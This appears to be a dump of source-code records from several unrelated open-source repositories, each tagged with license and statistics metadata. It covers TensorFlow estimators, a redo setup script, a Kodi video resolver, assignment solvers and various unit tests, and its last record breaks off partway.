dnn_hidden_units: List of hidden units per layer. All layers are fully
connected.
dnn_activation_fn: Activation function applied to each layer. If `None`,
will use `tf.nn.relu`.
dnn_dropout: When not None, the probability we will drop out
a given coordinate.
gradient_clip_norm: A float > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
tf.clip_by_global_norm for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: RunConfig object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
targets which are the output of `input_fn` and
returns features and targets which will be fed
into the model.
Raises:
ValueError: If `n_classes` < 2.
ValueError: If both `linear_feature_columns` and `dnn_features_columns`
are empty at the same time.
"""
if n_classes < 2:
raise ValueError("n_classes should be greater than 1. Given: {}".format(
n_classes))
if enable_centered_bias is None:
enable_centered_bias = True
_changing_default_center_bias()
target_column = layers.multi_class_target(
n_classes=n_classes,
weight_column_name=weight_column_name)
super(DNNLinearCombinedClassifier, self).__init__(
model_dir=model_dir,
linear_feature_columns=linear_feature_columns,
linear_optimizer=linear_optimizer,
_joint_linear_weights=_joint_linear_weights,
dnn_feature_columns=dnn_feature_columns,
dnn_optimizer=dnn_optimizer,
dnn_hidden_units=dnn_hidden_units,
dnn_activation_fn=dnn_activation_fn,
dnn_dropout=dnn_dropout,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
target_column=target_column,
config=config,
feature_engineering_fn=feature_engineering_fn)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict(self, x=None, input_fn=None, batch_size=None, as_iterable=False):
"""Returns predicted classes for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted classes (or an iterable of predicted classes if
as_iterable is True).
"""
predictions = self.predict_proba(
x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable)
if as_iterable:
return (np.argmax(p, axis=0) for p in predictions)
else:
return np.argmax(predictions, axis=1)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_proba(
self, x=None, input_fn=None, batch_size=None, as_iterable=False):
"""Returns prediction probabilities for given features.
Args:
x: features.
input_fn: Input function. If set, x and y must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted probabilities (or an iterable of predicted
probabilities if as_iterable is True).
"""
return super(DNNLinearCombinedClassifier, self).predict(
x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable)
class DNNLinearCombinedRegressor(_DNNLinearCombinedBaseEstimator):
"""A regressor for TensorFlow Linear and DNN joined training models.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
education_emb = embedding_column(sparse_id_column=education, dimension=16,
combiner="sum")
occupation_emb = embedding_column(sparse_id_column=occupation, dimension=16,
combiner="sum")
estimator = DNNLinearCombinedRegressor(
# common settings
weight_column_name=weight_column_name,
# wide settings
linear_feature_columns=[education_x_occupation],
linear_optimizer=tf.train.FtrlOptimizer(...),
# deep settings
dnn_feature_columns=[education_emb, occupation_emb],
dnn_hidden_units=[1000, 500, 100],
dnn_optimizer=tf.train.ProximalAdagradOptimizer(...))
# To apply L1 and L2 regularization, you can set optimizers as follows:
tf.train.ProximalAdagradOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=0.001)
# It is same for FtrlOptimizer.
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.train(input_fn_train)
estimator.evaluate(input_fn_eval)
estimator.predict(x)
```
Input of `fit`, `train`, and `evaluate` should have following features,
otherwise there will be a `KeyError`:
if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
for each `column` in `dnn_feature_columns` + `linear_feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_linear_weights pylint: disable=invalid-name
model_dir=None,
weight_column_name=None,
linear_feature_columns=None,
linear_optimizer=None,
_joint_linear_weights=False,
dnn_feature_columns=None,
dnn_optimizer=None,
dnn_hidden_units=None,
dnn_activation_fn=nn.relu,
dnn_dropout=None,
gradient_clip_norm=None,
enable_centered_bias=None,
target_dimension=1,
config=None,
feature_engineering_fn=None):
"""Initializes a DNNLinearCombinedRegressor instance.
Args:
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
linear_feature_columns: An iterable containing all the feature columns
used by linear part of the model. All items in the set must be
instances of classes derived from `FeatureColumn`.
linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the linear part of the model. If `None`, will use a FTRL optimizer.
_joint_linear_weights: If True a single (possibly partitioned) variable
will be used to store the linear model weights. It's faster, but
requires that all columns are sparse and have the 'sum' combiner.
dnn_feature_columns: An iterable containing all the feature columns used
by deep part of the model. All items in the set must be instances of
classes derived from `FeatureColumn`.
dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the deep part of the model. If `None`, will use an Adagrad optimizer.
dnn_hidden_units: List of hidden units per layer. All layers are fully
connected.
dnn_activation_fn: Activation function applied to each layer. If None,
will use `tf.nn.relu`.
dnn_dropout: When not None, the probability we will drop out
a given coordinate.
gradient_clip_norm: A float > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
tf.clip_by_global_norm for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
target_dimension: TODO(zakaria): dimension of the target for multilabels.
config: RunConfig object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
targets which are the output of `input_fn` and
returns features and targets which will be fed
into the model.
Raises:
ValueError: If both linear_feature_columns and dnn_features_columns are
empty at the same time.
"""
if enable_centered_bias is None:
enable_centered_bias = True
_changing_default_center_bias()
target_column = layers.regression_target(
weight_column_name=weight_column_name,
target_dimension=target_dimension)
super(DNNLinearCombinedRegressor, self).__init__(
model_dir=model_dir,
linear_feature_columns=linear_feature_columns,
linear_optimizer=linear_optimizer,
_joint_linear_weights=_joint_linear_weights,
dnn_feature_columns=dnn_feature_columns,
dnn_optimizer=dnn_optimizer,
dnn_hidden_units=dnn_hidden_units,
dnn_activation_fn=dnn_activation_fn,
dnn_dropout=dnn_dropout,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
target_column=target_column,
config=config,
feature_engineering_fn=feature_engineering_fn)
| apache-2.0 | -5,458,151,870,051,754,000 | 44.222054 | 82 | 0.665397 | false | 4.153878 | true | false | false |
tomato42/fsresck | fsresck/fragmenter.py | 1 | 1882 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Description: File system resilience testing application
# Author: Hubert Kario <[email protected]>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Copyright (c) 2015 Hubert Kario. All rights reserved.
#
# This copyrighted material is made available to anyone wishing
# to use, modify, copy, or redistribute it subject to the terms
# and conditions of the GNU General Public License version 2.
#
# This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""Methods to fragment list of writes."""
from .write import Write
class Fragmenter(object):
"""Object for fragmenting a list of writes further."""
def __init__(self, sector_size=512):
"""
Create an object.
@param sector_size: maximum size of the generated fragments
"""
self.sector_size = sector_size
def fragment(self, writes):
"""
Return a generator with fragmented Write objects from passed writes.
@param writes: list of Write objects
"""
for write in writes:
data = write.data
offset = write.offset
while data:
ret = Write(offset, data[:self.sector_size])
offset += len(ret.data)
data = data[self.sector_size:]
yield ret
| gpl-2.0 | 6,986,712,135,830,994,000 | 32.607143 | 76 | 0.575983 | false | 4.524038 | false | false | false |
apenwarr/redo | setup.py | 1 | 2105 | import os, setuptools, subprocess
# Construct the redo input files, including redo.version, if we're
# starting from the original redo source dir. If we're running
# from the python pip package, the files already exist, so we
# skip this step.
mydir = os.path.dirname(__file__)
script = os.path.join(mydir, 'do')
verfile = os.path.join(mydir, 'redo/version/_version.py')
if os.path.exists(script) and not os.path.exists(verfile):
subprocess.check_call([script])
import redo.version
def read(fname):
return open(os.path.join(mydir, fname)).read()
# FIXME: we probably need to build redo/sh on the target system, somehow.
setuptools.setup(
name = 'redo-tools',
version = redo.version.TAG.replace('-', '+', 1),
python_requires='>=2.7',
author = 'Avery Pennarun',
author_email = '[email protected]',
description = ('djb redo: a recursive, general purpose build system.'),
long_description=read('README.md'),
long_description_content_type='text/markdown',
license = 'Apache',
keywords = 'redo redo-ifchange make dependencies build system compiler',
url = 'https://github.com/apenwarr/redo',
packages = setuptools.find_packages(),
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Utilities',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX',
'Topic :: Software Development :: Build Tools',
'Topic :: Utilities',
],
entry_points = {
'console_scripts': [
'redo=redo.cmd_redo:main',
'redo-always=redo.cmd_always:main',
'redo-ifchange=redo.cmd_ifchange:main',
'redo-ifcreate=redo.cmd_ifcreate:main',
'redo-log=redo.cmd_log:main',
'redo-ood=redo.cmd_ood:main',
'redo-sources=redo.cmd_sources:main',
'redo-stamp=redo.cmd_stamp:main',
'redo-targets=redo.cmd_targets:main',
'redo-unlocked=redo.cmd_unlocked:main',
'redo-whichdo=redo.cmd_whichdo:main',
],
},
)
| apache-2.0 | -2,273,679,286,823,372,000 | 34.677966 | 76 | 0.628029 | false | 3.579932 | false | false | false |
repotvsupertuga/tvsupertuga.repository | instal/script.module.resolveurl/lib/resolveurl/plugins/indavideo.py | 3 | 2726 | # -*- coding: UTF-8 -*-
"""
Kodi resolveurl plugin
Copyright (C) 2016 alifrezser
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import json
import re
from lib import helpers
from resolveurl import common
from resolveurl.resolver import ResolveUrl, ResolverError
class IndavideoResolver(ResolveUrl):
name = "indavideo"
domains = ["indavideo.hu"]
pattern = '(?://|\.)(indavideo\.hu)/(?:player/video|video)/([0-9A-Za-z-_]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'User-Agent': common.FF_USER_AGENT}
html = self.net.http_GET(web_url, headers=headers).content
data = json.loads(html)
if data['success'] == '0':
html = self.net.http_GET('http://indavideo.hu/video/%s' % media_id).content
hash = re.search('emb_hash.+?value\s*=\s*"([^"]+)', html)
if not hash:
raise ResolverError('File not found')
web_url = self.get_url(host, hash.group(1))
html = self.net.http_GET(web_url).content
data = json.loads(html)
if data['success'] == '1':
video_files = data['data']['video_files']
if not video_files:
raise ResolverError('File removed')
tokens = data['data']['filesh']
sources = []
if isinstance(video_files, dict): video_files = video_files.values()
for i in video_files:
match = re.search('\.(\d+)\.mp4', i)
if match: sources.append((match.group(1), i))
sources = [(i[0], i[1] + '&token=%s' % tokens[i[0]]) for i in sources]
try: sources = list(set(sources))
except: pass
sources = sorted(sources, key=lambda x: x[0])[::-1]
return helpers.pick_source(sources)
raise ResolverError('File not found')
def get_url(self, host, media_id):
return 'http://amfphp.indavideo.hu/SYm0json.php/player.playerHandler.getVideoData/%s' % (media_id)
| gpl-2.0 | 5,358,056,482,370,218,000 | 37.942857 | 106 | 0.604182 | false | 3.786111 | false | false | false |
rhyolight/nupic.son | app/melange/views/settings.py | 1 | 2584 | # Copyright 2013 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module with user settings related views."""
from django import forms
from django import http
from melange.logic import settings as settings_logic
from melange.request import access
from melange.views.helper import urls
from soc.logic import cleaning
from soc.views import base
from soc.views.helper import url_patterns
class UserSettingsForm(forms.Form):
"""Form to set user settings for the page."""
view_as = forms.CharField()
def clean_view_as(self):
"""Cleans view_as field."""
user = cleaning.clean_existing_user('view_as')(self)
return user.key if user else None
class UserSettings(base.RequestHandler):
"""View to list and set all user settings for the page."""
access_checker = access.DEVELOPER_ACCESS_CHECKER
def djangoURLPatterns(self):
"""See base.RequestHandler.djangoURLPatterns for specification."""
return [
url_patterns.url(
r'site', r'settings/user/%s$' % url_patterns.USER,
self, name=urls.UrlNames.USER_SETTINGS)
]
def templatePath(self):
"""See base.RequestHandler.templatePath for specification."""
return 'melange/settings/user_settings.html'
def context(self, data, check, mutator):
"""See base.RequestHandler.context for specification."""
user_settings = settings_logic.getUserSettings(data.url_ndb_user.key)
initial = {}
if user_settings.view_as is not None:
initial['view_as'] = user_settings.view_as.id()
return {'form': UserSettingsForm(data=data.POST or None, initial=initial)}
def post(self, data, check, mutator):
"""See base.RequestHandler.post for specification."""
form = UserSettingsForm(data=data.POST)
if form.is_valid():
view_as = form.cleaned_data['view_as'] or None
settings_logic.setUserSettings(data.url_ndb_user.key, view_as=view_as)
return http.HttpResponseRedirect(data.request.get_full_path())
else:
# TODO(nathaniel): problematic self-use.
return self.get(data, check, mutator)
| apache-2.0 | 621,038,370,779,500,400 | 31.708861 | 78 | 0.718266 | false | 3.772263 | false | false | false |
joelagnel/trappy | tests/test_systrace.py | 1 | 3330 | # Copyright 2016-2017 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import utils_tests
import trappy
class TestSystrace(utils_tests.SetupDirectory):
def __init__(self, *args, **kwargs):
super(TestSystrace, self).__init__(
[("trace_systrace.html", "trace.html")],
*args,
**kwargs)
def test_systrace_html(self):
"""Tests parsing of a systrace embedded textual trace """
events = ["sched_switch", "sched_wakeup", "trace_event_clock_sync"]
trace = trappy.SysTrace("trace.html", events=events)
self.assertTrue(hasattr(trace, "sched_switch"))
self.assertEquals(len(trace.sched_switch.data_frame), 4)
self.assertTrue("prev_comm" in trace.sched_switch.data_frame.columns)
self.assertTrue(hasattr(trace, "sched_wakeup"))
self.assertEquals(len(trace.sched_wakeup.data_frame), 4)
self.assertTrue("target_cpu" in trace.sched_wakeup.data_frame.columns)
self.assertTrue(hasattr(trace, "trace_event_clock_sync"))
self.assertEquals(len(trace.trace_event_clock_sync.data_frame), 1)
self.assertTrue("realtime_ts" in trace.trace_event_clock_sync.data_frame.columns)
def test_cpu_counting(self):
"""SysTrace traces know the number of cpus"""
trace = trappy.SysTrace("trace.html")
self.assertTrue(hasattr(trace, "_cpus"))
self.assertEquals(trace._cpus, 3)
class TestLegacySystrace(utils_tests.SetupDirectory):
def __init__(self, *args, **kwargs):
super(TestLegacySystrace, self).__init__(
[("trace_legacy_systrace.html", "trace.html")],
*args,
**kwargs)
def test_systrace_html(self):
"""Tests parsing of a legacy systrace embedded textual trace """
events = ["sched_switch", "sched_wakeup", "sched_contrib_scale_f"]
trace = trappy.SysTrace("trace.html", events=events)
self.assertTrue(hasattr(trace, "sched_switch"))
self.assertEquals(len(trace.sched_switch.data_frame), 3)
self.assertTrue("prev_comm" in trace.sched_switch.data_frame.columns)
self.assertTrue(hasattr(trace, "sched_wakeup"))
self.assertEquals(len(trace.sched_wakeup.data_frame), 2)
self.assertTrue("target_cpu" in trace.sched_wakeup.data_frame.columns)
self.assertTrue(hasattr(trace, "sched_contrib_scale_f"))
self.assertEquals(len(trace.sched_contrib_scale_f.data_frame), 2)
self.assertTrue("freq_scale_factor" in trace.sched_contrib_scale_f.data_frame.columns)
def test_cpu_counting(self):
"""In a legacy SysTrace trace, trappy gets the number of cpus"""
trace = trappy.SysTrace("trace.html")
self.assertTrue(hasattr(trace, "_cpus"))
self.assertEquals(trace._cpus, 8)
| apache-2.0 | 2,596,708,892,532,037,000 | 37.275862 | 94 | 0.667267 | false | 3.737374 | true | false | false |
e2crawfo/dps | motmetrics/lap.py | 1 | 6069 | import numpy as np
from collections import OrderedDict
def linear_sum_assignment(costs, solver=None):
"""Solve a linear sum assignment problem (LSA).
For large datasets solving the minimum cost assignment becomes the dominant runtime part.
We therefore support various solvers out of the box (currently lapsolver, scipy, ortools, munkres)
Params
------
costs : np.array
numpy matrix containing costs. Use NaN/Inf values for unassignable
row/column pairs.
Kwargs
------
solver : callable or str, optional
When str: name of solver to use.
When callable: function to invoke
When None: uses first available solver
"""
solver = solver or default_solver
if isinstance(solver, str):
# Try resolve from string
solver = solver_map.get(solver, None)
assert callable(solver), 'Invalid LAP solver.'
return solver(costs)
def lsa_solve_scipy(costs):
"""Solves the LSA problem using the scipy library."""
from scipy.optimize import linear_sum_assignment as scipy_solve
# Note there is an issue in scipy.optimize.linear_sum_assignment where
# it runs forever if an entire row/column is infinite or nan. We therefore
# make a copy of the distance matrix and compute a safe value that indicates
# 'cannot assign'. Also note + 1 is necessary in below inv-dist computation
# to make invdist bigger than max dist in case max dist is zero.
inv = ~np.isfinite(costs)
if inv.any():
costs = costs.copy()
valid = costs[~inv]
INVDIST = 2 * valid.max() + 1 if valid.shape[0] > 0 else 1.
costs[inv] = INVDIST
return scipy_solve(costs)
def lsa_solve_lapsolver(costs):
"""Solves the LSA problem using the lapsolver library."""
from lapsolver import solve_dense
return solve_dense(costs)
def lsa_solve_munkres(costs):
"""Solves the LSA problem using the Munkres library."""
from munkres import Munkres, DISALLOWED
m = Munkres()
costs = costs.copy()
inv = ~np.isfinite(costs)
if inv.any():
costs = costs.astype(object)
costs[inv] = DISALLOWED
indices = np.array(m.compute(costs), dtype=np.int64)
return indices[:,0], indices[:,1]
def lsa_solve_ortools(costs):
"""Solves the LSA problem using Google's optimization tools."""
from ortools.graph import pywrapgraph
# Google OR tools only support integer costs. Here's our attempt
# to convert from floating point to integer:
#
# We search for the minimum difference between any two costs and
# compute the first non-zero digit after the decimal place. Then
# we compute a factor,f, that scales all costs so that the difference
# is integer representable in the first digit.
#
# Example: min-diff is 0.001, then first non-zero digit place -3, so
# we scale by 1e3.
#
# For small min-diffs and large costs in general there is a change of
# overflowing.
valid = np.isfinite(costs)
min_e = -8
unique = np.unique(costs[valid])
if unique.shape[0] == 1:
min_diff = unique[0]
elif unique.shape[0] > 1:
min_diff = np.diff(unique).min()
else:
min_diff = 1
min_diff_e = 0
if min_diff != 0.0:
min_diff_e = int(np.log10(np.abs(min_diff)))
if min_diff_e < 0:
min_diff_e -= 1
e = min(max(min_e, min_diff_e), 0)
f = 10**abs(e)
assignment = pywrapgraph.LinearSumAssignment()
for r in range(costs.shape[0]):
for c in range(costs.shape[1]):
if valid[r,c]:
assignment.AddArcWithCost(r, c, int(costs[r,c]*f))
if assignment.Solve() != assignment.OPTIMAL:
return linear_sum_assignment(costs, solver='scipy')
if assignment.NumNodes() == 0:
return np.array([], dtype=np.int64), np.array([], dtype=np.int64)
pairings = []
for i in range(assignment.NumNodes()):
pairings.append([i, assignment.RightMate(i)])
indices = np.array(pairings, dtype=np.int64)
return indices[:,0], indices[:,1]
def lsa_solve_lapjv(costs):
from lap import lapjv
inv = ~np.isfinite(costs)
if inv.any():
costs = costs.copy()
valid = costs[~inv]
INVDIST = 2 * valid.max() + 1 if valid.shape[0] > 0 else 1.
costs[inv] = INVDIST
r = lapjv(costs, return_cost=False, extend_cost=True)
indices = np.array((range(costs.shape[0]), r[0]), dtype=np.int64).T
indices = indices[indices[:, 1] != -1]
return indices[:,0], indices[:,1]
def init_standard_solvers():
import importlib
from importlib import util
global available_solvers, default_solver, solver_map
solvers = [
('lapsolver', lsa_solve_lapsolver),
('lap', lsa_solve_lapjv),
('scipy', lsa_solve_scipy),
('munkres', lsa_solve_munkres),
('ortools', lsa_solve_ortools),
]
solver_map = dict(solvers)
available_solvers = [s[0] for s in solvers if importlib.util.find_spec(s[0]) is not None]
if len(available_solvers) == 0:
import warnings
default_solver = None
warnings.warn('No standard LAP solvers found. Consider `pip install lapsolver` or `pip install scipy`', category=RuntimeWarning)
else:
default_solver = available_solvers[0]
init_standard_solvers()
from contextlib import contextmanager
@contextmanager
def set_default_solver(newsolver):
'''Change the default solver within context.
Intended usage
costs = ...
mysolver = lambda x: ... # solver code that returns pairings
with lap.set_default_solver(mysolver):
rids, cids = lap.linear_sum_assignment(costs)
Params
------
newsolver : callable or str
new solver function
'''
global default_solver
oldsolver = default_solver
try:
default_solver = newsolver
yield
finally:
default_solver = oldsolver
| apache-2.0 | -6,842,815,007,946,274,000 | 29.044554 | 136 | 0.628604 | false | 3.750927 | false | false | false |
pietje666/plugin.video.vrt.nu | tests/test_tokenresolver.py | 1 | 2324 | # -*- coding: utf-8 -*-
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""Unit tests for TokenResolver functionality"""
# pylint: disable=invalid-name
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from tokenresolver import TokenResolver
xbmc = __import__('xbmc')
xbmcaddon = __import__('xbmcaddon')
xbmcgui = __import__('xbmcgui')
xbmcplugin = __import__('xbmcplugin')
xbmcvfs = __import__('xbmcvfs')
addon = xbmcaddon.Addon()
class TestTokenResolver(unittest.TestCase):
"""TestCase class"""
_tokenresolver = TokenResolver()
username = None
password = None
def setUp(self):
"""Build up function for TestCase class"""
# Save password
self.username = addon.settings['username']
self.password = addon.settings['password']
def tearDown(self):
"""Clean up function for TestCase class"""
# Restore password
addon.settings['username'] = self.username
addon.settings['password'] = self.password
def test_refresh_login(self):
"""Test refreshing login"""
self._tokenresolver.refresh_login()
def test_cleanup_userdata(self):
"""Test cleaning up userdata"""
self._tokenresolver.cleanup_userdata()
def test_successful_login(self):
"""Test successful login"""
self.username = addon.settings['username']
self.password = addon.settings['password']
self._tokenresolver.login(refresh=False)
def test_invalid_login(self):
"""Test invalid login"""
addon.settings['username'] = 'foo'
addon.settings['password'] = 'bar'
self._tokenresolver.login(refresh=False)
def test_missing_username(self):
"""Test missing username"""
addon.settings['username'] = ''
addon.settings['password'] = self.password
self._tokenresolver.login(refresh=True)
self._tokenresolver.login(refresh=False)
def test_missing_password(self):
"""Test missing password"""
addon.settings['username'] = self.username
addon.settings['password'] = ''
self._tokenresolver.login(refresh=True)
self._tokenresolver.login(refresh=False)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 8,739,727,042,616,047,000 | 29.986667 | 91 | 0.645009 | false | 4.157424 | true | false | false |
NickShaffner/rhea | rhea/cores/video/lcd/lt24lcd.py | 2 | 6910 | """
This module contains a video driver for the terasic LT24
LCD display ...
"""
from __future__ import division
import myhdl
from myhdl import Signal, intbv, enum, always_seq, concat
from .lt24intf import LT24Interface
from .lt24lcd_init_sequence import init_sequence, build_init_rom
from .lt24lcd_driver import lt24lcd_driver
@myhdl.block
def lt24lcd(glbl, vmem, lcd):
""" A video display driver for the terasic LT24 LCD display.
This driver reads pixels from the VideoMemory interface and transfers
them to the LT24 display. This hardware module (component) will also
perform the initial display configuration.
(arguments == ports)
Arguments:
glbl (Global): global signals, clock, reset, enable, etc.
vmem (VideoMemory): video memory interface, the driver will read
pixels from this interface.
lcd (LT24Interface): The external LT24 interface.
Parameters:
None
RGB 5-6-5 (8080-system 16bit parallel bus)
"""
assert isinstance(lcd, LT24Interface)
resolution, refresh_rate = (240, 320), 60
number_of_pixels = resolution[0] * resolution[1]
# local references to signals in interfaces
clock, reset = glbl.clock, glbl.reset
# make sure the user timer is configured
assert glbl.tick_user is not None
# write out a new VMEM to the LCD display, a write cycle
# consists of putting the video data on the bus and latching
# with the `wrx` signal. Init (write once) the column and
# page addresses (cmd = 2A, 2B) then write mem (2C)
states = enum(
'init_wait_reset', # wait for the controller to reset the LCD
'init_start', # start the display init sequence
'init_start_cmd', # send a command, port of the display seq
'init_next', # determine if another command
'write_cmd_start', # command subroutine
'write_cmd', # command subroutine
'display_update_start', # update the display
'display_update_start_p', # delay for command ack
'display_update', # update the display
'display_update_next', # wait for driver to ack pixel xfered
'display_update_end' # end of display update
)
state = Signal(states.init_wait_reset)
state_prev = Signal(states.init_wait_reset)
cmd = Signal(intbv(0)[8:])
return_state = Signal(states.init_wait_reset)
num_hor_pxl, num_ver_pxl = resolution
print("resolution {}x{} = {} number of pixes".format(
num_hor_pxl, num_ver_pxl, number_of_pixels))
hcnt = intbv(0, min=0, max=num_hor_pxl)
vcnt = intbv(0, min=0, max=num_ver_pxl)
# signals to start a new command transaction to the LCD
datalen = Signal(intbv(0, min=0, max=number_of_pixels+1))
data = Signal(intbv(0)[16:])
datasent = Signal(bool(0))
datalast = Signal(bool(0))
cmd_in_progress = Signal(bool(0))
# --------------------------------------------------------
# LCD driver
gdrv = lt24lcd_driver(glbl, lcd, cmd, datalen, data,
datasent, datalast, cmd_in_progress)
# --------------------------------------------------------
# build the display init sequency ROM
rom, romlen, maxpause = build_init_rom(init_sequence)
offset = Signal(intbv(0, min=0, max=romlen+1))
pause = Signal(intbv(0, min=0, max=maxpause+1))
# --------------------------------------------------------
# state-machine
@always_seq(clock.posedge, reset=reset)
def beh_state_machine():
state_prev.next = state
if state == states.init_wait_reset:
if lcd.reset_complete:
state.next = states.init_start
elif state == states.init_start:
v = rom[offset]
# @todo: change the table to only contain the number of
# bytes to be transferred
datalen.next = v - 3
p = rom[offset+1]
pause.next = p
offset.next = offset + 2
state.next = states.init_start_cmd
elif state == states.init_start_cmd:
v = rom[offset]
cmd.next = v
if datalen > 0:
v = rom[offset+1]
data.next = v
offset.next = offset + 2
else:
offset.next = offset + 1
state.next = states.write_cmd_start
return_state.next = states.init_next
elif state == states.init_next:
if pause == 0:
if offset == romlen:
state.next = states.display_update_start
else:
state.next = states.init_start
elif glbl.tick_ms:
pause.next = pause - 1
elif state == states.write_cmd_start:
state.next = states.write_cmd
elif state == states.write_cmd:
if cmd_in_progress:
if datasent and not datalast:
v = rom[offset]
data.next = v
offset.next = offset+1
else:
cmd.next = 0
state.next = return_state
elif state == states.display_update_start:
if glbl.tick_user:
cmd.next = 0x2C
state.next = states.display_update_start_p
datalen.next = number_of_pixels
elif state == states.display_update_start_p:
state.next =states.display_update
elif state == states.display_update:
assert cmd_in_progress
if vcnt == num_ver_pxl-1:
hcnt[:] = 0
vcnt[:] = 0
elif hcnt == num_hor_pxl-1:
hcnt[:] = 0
vcnt[:] = vcnt + 1
else:
hcnt[:] = hcnt + 1
# this will be the pixel for the next write cycle
vmem.hpxl.next = hcnt
vmem.vpxl.next = vcnt
# this is the pixel for the current write cycle
if hcnt == 0 and vcnt == 0:
cmd.next = 0
state.next = states.display_update_end
else:
data.next = concat(vmem.red, vmem.green, vmem.blue)
state.next = states.display_update_next
elif state == states.display_update_next:
if cmd_in_progress:
if datasent and not datalast:
state.next = states.display_update
else:
cmd.next = 0
state.next = states.display_update_end
elif state == states.display_update_end:
# wait till the driver ack the command completion
if not cmd_in_progress:
state.next = states.display_update_start
return myhdl.instances()
| mit | -2,334,838,913,955,180,000 | 34.255102 | 76 | 0.544573 | false | 3.987305 | false | false | false |
openeventdata/UniversalPetrarch | UniversalPetrarch/tests/test_json_pipeline.py | 1 | 1501 | import sys
sys.path.append('..')
import datetime
from bson.objectid import ObjectId
import petrarch_ud
import PETRreader
formatted = [{u'language': u'english',
u'title': u'6 killed in attacks in Iraqi capital Friday',
u'url': u'http://www.menafn.com/1094827896/6-killed-in-attacks-in-Iraqi-capital-Friday?src=RSS',
u'stanford': 1,
u'content': "Ukraine ratified a sweeping agreement with the European Union on Tuesday.",
u'source': u'menafn_iraq',
u'parsed_sents': ["""1 Ukraine Ukraine PROPN NNP Number=Sing 2 nsubj _ _
